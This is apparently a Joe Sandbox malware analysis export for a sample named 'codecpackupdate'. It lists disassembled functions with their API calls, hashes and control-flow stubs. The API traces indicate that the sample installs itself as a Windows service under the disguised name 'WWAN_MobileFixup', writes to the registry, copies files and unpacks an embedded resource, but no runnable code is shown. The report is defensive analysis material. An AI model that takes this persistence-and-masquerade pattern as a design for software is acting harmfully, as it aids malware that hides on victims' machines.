• API String ID: 2057626494-1443291236
• Opcode ID: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
• Instruction ID: 0a95150e04a59658555c79dd88d1413615d8933c927d5f415567a3b7127da264
• Opcode Fuzzy Hash: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
• Instruction Fuzzy Hash: 32218EB19407059BDB08AFA6DE49A6E7BB9EF44304F10413EFA05BB2E1DB384550CB99
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph rendering omitted; function entry 40417b)
APIs
• GetCurrentProcess.KERNEL32(?,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 0040418B
• TerminateProcess.KERNEL32(00000000,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 00404192
• ExitProcess.KERNEL32 ref: 0040420C
Memory Dump Source
• Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: c2260ba4ba3a7ce087c0bc5af1c4df8ffe5f30a9fab647541faefa4ff898e018
• Instruction ID: 513b21a01c22477a45cfaa627a8dde47c11b7c557bbe69d9200b46c06abf8301
• Opcode Fuzzy Hash: c2260ba4ba3a7ce087c0bc5af1c4df8ffe5f30a9fab647541faefa4ff898e018
• Instruction Fuzzy Hash: 36012DB1644301DADA10AF64FD8CA0A77A4EBE0350B10457FF6417B2E0C739A8D1CB2E
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph rendering omitted)
APIs
• GetCommandLineW.KERNEL32 ref: 0040223C
• CommandLineToArgvW.SHELL32(00000000), ref: 0040B040
• GetLocalTime.KERNEL32(00409FB8), ref: 0040B942
Memory Dump Source
• Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
Similarity
• API ID: CommandLine$ArgvLocalTime
• String ID:
• API String ID: 3768950922-0
• Opcode ID: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
• Instruction ID: fe59c91cec6a1bbfec2f2a739a0674a99631b7336b4ea49b5c82aa235aaf9e13
• Opcode Fuzzy Hash: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
• Instruction Fuzzy Hash: F4D01273448012EBC2007BE19A0E99D37E5A64A3523224077F243F11E1CB3C44959B6F
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph rendering omitted; function entry 40b33b, calls CopyFileA)
Memory Dump Source
• Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
Similarity
• API ID: CopyFile
• String ID: ?NI
• API String ID: 1304948518-117959909
• Opcode ID: 1ba00870fd27b3cdf3e8498eb1257aa92a605fb7dfbe0c732b82863bd5f53ab8
• Instruction ID: c2822da89412b159851219babc5dd957992176794b394267062855fcf32f5c0e
• Opcode Fuzzy Hash: 1ba00870fd27b3cdf3e8498eb1257aa92a605fb7dfbe0c732b82863bd5f53ab8
• Instruction Fuzzy Hash: 77D02B3138921246CD0265242E0EAF67309C7A3349B241977ED07FF2C0D1B9861762CD
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph rendering omitted; function entry 40325a)
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
  • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
• HeapDestroy.KERNEL32 ref: 004032AA
  • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
Memory Dump Source
• Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
Similarity
• API ID: Heap$AllocCreateDestroyVersion
• String ID:
• API String ID: 2507506473-0
• Opcode ID: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
• Instruction ID: bdc1dc1f8be9f1a85e4812a31df9c453441b6f572615afd11c7cbbe7009e603d
• Opcode Fuzzy Hash: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
• Instruction Fuzzy Hash: 08F0E5319043015AEF245F306E463263EA8DB50397F1184BFF401F82D1EB78C790950A
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph rendering omitted; function entry 40b40c)
APIs
• RegQueryValueExA.KERNELBASE ref: 0040B4D1
• RegCloseKey.KERNELBASE(?), ref: 0040B825
Memory Dump Source
• Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
Similarity
• API ID: CloseQueryValue
• String ID:
• API String ID: 3356406503-0
• Opcode ID: 134ce427d92d70c0111e1806a8c5cfdfd9407f9f49210c1a287f1998412d3728
• Instruction ID: a3e4645529f843f61550e48a598415364148f40a2ce15bb9cbadf78dc0097e25
• Opcode Fuzzy Hash: 134ce427d92d70c0111e1806a8c5cfdfd9407f9f49210c1a287f1998412d3728
• Instruction Fuzzy Hash: A4D0C931948106EAC7009FB08F0D5397EA9FA083417218577A603B00E0D7BD46126A9E
Uniqueness
Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 134 40b4fc-40b50e 135 40b510-40b528 134->135 136 40b4d3-40b4e6 CreateDirectoryA 134->136 138 40b52a-40b535 135->138 139 40b59d-40b5b5 135->139 141 40b58b 138->141 140 40b5b7-40b5b9 139->140 139->141 141->139
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE ref: 0040B4E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory
                                                                          • String ID:
                                                                          • API String ID: 4241100979-0
                                                                          • Opcode ID: fcd0fb28436346cebec9de2a814f493663ffb4acfc5454b8ba783580e8604382
                                                                          • Instruction ID: ebd2c6e02f9d43b3d40f01d17a74bd438e6d2ac48b0db6d6420a9778e4eaa713
                                                                          • Opcode Fuzzy Hash: fcd0fb28436346cebec9de2a814f493663ffb4acfc5454b8ba783580e8604382
                                                                          • Instruction Fuzzy Hash: 4BF0A26345C29CAFC321D5B83C448E23F74F5931507554EA7D151AF087D2198953C3CD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph 142 4028fd-40b3c8 RegOpenKeyExA 144 40b934-40b936 142->144 145 40ba4e 142->145 144->145 145->144 146 40ba54 145->146
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(80000002), ref: 0040B3C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: 8340735e36433d2e621e99962aac8dbece34f8ed7b0fbf864752116af6356328
                                                                          • Instruction ID: 909e799b75931c5b62772d4b2f3710706e3fc10ef07775b3481c305365d9140b
                                                                          • Opcode Fuzzy Hash: 8340735e36433d2e621e99962aac8dbece34f8ed7b0fbf864752116af6356328
                                                                          • Instruction Fuzzy Hash: 72C04C60608146EAE6089AB189096762768EB44740F3149378913F16D0D339DA1665AF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph 148 40b3ea-40ba04 RegSetValueExA
                                                                          APIs
                                                                          • RegSetValueExA.KERNELBASE(?), ref: 0040B9FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID:
                                                                          • API String ID: 3702945584-0
                                                                          • Opcode ID: 5317ccae25348d6653a0bc53609ee191fbdf3e00c6017a1cf178d5707409b4b6
                                                                          • Instruction ID: 4d13c9e98189893827979a362c4bd14f52071052fe37cb831e46076aa9f9f1e9
                                                                          • Opcode Fuzzy Hash: 5317ccae25348d6653a0bc53609ee191fbdf3e00c6017a1cf178d5707409b4b6
                                                                          • Instruction Fuzzy Hash: 9FC08CB1804409FACB061BD09C08A3C7E3AE708788F200462E10330CA0C33E0BB2BB6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph 151 40b397-40ba76 CopyFileA 154 402760-402761 151->154 155 40ba7c 151->155 157 40ba7e 155->157 157->157
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CopyFile
                                                                          • String ID:
                                                                          • API String ID: 1304948518-0
                                                                          • Opcode ID: 7d38dac9929fb4991dc41ff22106602b2e1087a9a39ff8f9de006141421cb0d1
                                                                          • Instruction ID: 4b668b5fb2a19e430f9510732bbbf35e32ddcc61e88bebebdf2395f5775374df
                                                                          • Opcode Fuzzy Hash: 7d38dac9929fb4991dc41ff22106602b2e1087a9a39ff8f9de006141421cb0d1
                                                                          • Instruction Fuzzy Hash: AAB012B4384214A6E5006A300F8DF37121DDB007C1F1400333507F60E0C6FCC981657E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph 162 40b4de-40b4e6 CreateDirectoryA
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE ref: 0040B4E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory
                                                                          • String ID:
                                                                          • API String ID: 4241100979-0
                                                                          • Opcode ID: c151bc14e0bb91fbb8e7eca4dafd0b7c5a4a5b715ebfa07865c3b19ad9e5cb26
                                                                          • Instruction ID: d70fb2d4326590eea8b65127b1b419e7c4e084d95afc867c60e11a96707e2c92
                                                                          • Opcode Fuzzy Hash: c151bc14e0bb91fbb8e7eca4dafd0b7c5a4a5b715ebfa07865c3b19ad9e5cb26
                                                                          • Instruction Fuzzy Hash: 64A0223008A020EAE00023000EA8C2B3C3CF8003C23208033B303B00C0833E080302BF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph 163 4028db-4028e1 RegCloseKey 164 40286b 163->164 164->163
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 990c3c1dea4594085966e104cf6a03199e71a4503b704534c7eb79dcaa3d89bf
                                                                          • Instruction ID: 76804de5ad9cf923849592551e73c5d136ae12485515376d4ea460b458854c4b
                                                                          • Opcode Fuzzy Hash: 990c3c1dea4594085966e104cf6a03199e71a4503b704534c7eb79dcaa3d89bf
                                                                          • Instruction Fuzzy Hash: 5DA01230C04409C7C20497A0C30C4283AB459043043114072C113B00D0C37C5502550A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegCreateKeyExA.KERNELBASE ref: 004028A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: c119085e98968012a478d05f9da36ab8ada70fc996d553aa7d263a9e4816e65c
                                                                          • Instruction ID: 94413375a01e53b797accf35fc7fe945d277f428ce3223a44cf6c20e190ec76b
                                                                          • Opcode Fuzzy Hash: c119085e98968012a478d05f9da36ab8ada70fc996d553aa7d263a9e4816e65c
                                                                          • Instruction Fuzzy Hash: 31900230344101EAE2104B315B0C21A2598550464571104355B0BE4190D6748511551D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: ManagerOpen
                                                                          • String ID:
                                                                          • API String ID: 1889721586-0
                                                                          • Opcode ID: dfaf3f851df420e3e7b0c4056ca2fcc5e50da974e7909aa90e6769422c755a01
                                                                          • Instruction ID: 893d3e26ed5c51661bf8be8d29d2bb54a563af28b692fefe241a45f5ad98b385
                                                                          • Opcode Fuzzy Hash: dfaf3f851df420e3e7b0c4056ca2fcc5e50da974e7909aa90e6769422c755a01
                                                                          • Instruction Fuzzy Hash: D29002201540019FC2504F105FAD01825D251403063710435E203F40E0D6744455A92E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 1586166983-0
                                                                          • Opcode ID: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                          • Instruction ID: b9dd472658aa79e8713cc1c43643f3a09ee23d5b7ec078f99577b19effab2280
                                                                          • Opcode Fuzzy Hash: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                          • Instruction Fuzzy Hash: 54F09A3260C2538EC74216656A082B67BA0AA51710B38847B9C87B51D2DBBC485376AF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CreateService
                                                                          • String ID:
                                                                          • API String ID: 1592570254-0
                                                                          • Opcode ID: 20bb668e72a770e7973f593bb331a6a58a03ea000dbdcb0468e7c3fb687a14c6
                                                                          • Instruction ID: e828ca7ff849c5aa2293def9fffda87c5c0e13961c3d7613c3eafe11c79639c0
                                                                          • Opcode Fuzzy Hash: 20bb668e72a770e7973f593bb331a6a58a03ea000dbdcb0468e7c3fb687a14c6
                                                                          • Instruction Fuzzy Hash: C7C04C30888105EBCB644F40AD58D2B3A79D680315B714876E507B69D0D33D6D56BAFF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegisterServiceCtrlHandlerA.ADVAPI32(WWAN_MobileFixup 2.33.197.66,Function_0000235E), ref: 004023C1
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 00402420
                                                                          • GetLastError.KERNEL32 ref: 00402422
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                          • GetLastError.KERNEL32 ref: 00402450
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 00402480
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                          • CloseHandle.KERNEL32 ref: 004024A1
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 004024CA
                                                                          Strings
                                                                          • WWAN_MobileFixup 2.33.197.66, xrefs: 004023BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                          • String ID: WWAN_MobileFixup 2.33.197.66
                                                                          • API String ID: 3346042915-2719033208
                                                                          • Opcode ID: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                          • Instruction ID: 16ab96e2cb68f3bca67a8d02827ccf702012fa4ba7b91bfe8048b6e668af4302
                                                                          • Opcode Fuzzy Hash: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                          • Instruction Fuzzy Hash: A621ECB0841310ABC2109F16EF4D9167EB8EBCA758F11413AE105BA2B2C7B94575CFAE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
                                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
                                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                          • API String ID: 2238633743-4044615076
                                                                          • Opcode ID: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                          • Instruction ID: 8e14f7a6750b1570260f033f2342e22bcd7c780a38ad1719db35514165c9b09a
                                                                          • Opcode Fuzzy Hash: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                          • Instruction Fuzzy Hash: 9F015232600701AFDB11EFB5AD80A1B3BE8EB45740315043AB909F2591D678D8359F69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
                                                                          • LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
                                                                          • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
                                                                          • LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
                                                                          • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 352835431-0
                                                                          • Opcode ID: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                          • Instruction ID: 228655485731442308ac41690fb54a5bf4aece3cc6a962a44786cceaeb1d8e11
                                                                          • Opcode Fuzzy Hash: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                          • Instruction Fuzzy Hash: 94518931504609AFDF228F55CD45EAF7FB9EB48744F20412AF912B12A0D3398D21DF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
                                                                          • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
                                                                          • WriteFile.KERNEL32(00000000), ref: 00404D43
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandleModuleNameWrite
                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                          • API String ID: 3784150691-4022980321
                                                                          • Opcode ID: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                          • Instruction ID: f140c2e8ca9dd112070b7b1a63e93dd9695d020ae797257d07982e8dddccbb03
                                                                          • Opcode Fuzzy Hash: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                          • Instruction Fuzzy Hash: 5531E5B2A012186FEF20E760DE49FDA336CEF85304F1005BBF945B61D0D6B89E548A19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1823725401-0
                                                                          • Opcode ID: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                          • Instruction ID: 34ba4f5269201e1e594d4a21fe80140370f79d481ab45775fabf70a7e665ef6c
                                                                          • Opcode Fuzzy Hash: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                          • Instruction Fuzzy Hash: E631C2F75042656FD7207FB99D8483BB69CE6C6358716093BFB42F3280D7798C4182AA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                          • GetLastError.KERNEL32 ref: 00401F86
                                                                          • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                          • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                          • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                          • GetTickCount.KERNEL32 ref: 00401FFB
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                          • String ID:
                                                                          • API String ID: 564119183-0
                                                                          • Opcode ID: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                          • Instruction ID: cd0a89f7906a11fa59f7c630caffefac6273cd55dd9fd3e2fc017d6917677aa9
                                                                          • Opcode Fuzzy Hash: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                          • Instruction Fuzzy Hash: DB312971A40251AFDB109FB99E489AF7B78EF49344B10807AFA46F7281D6748941C7A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
                                                                          • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
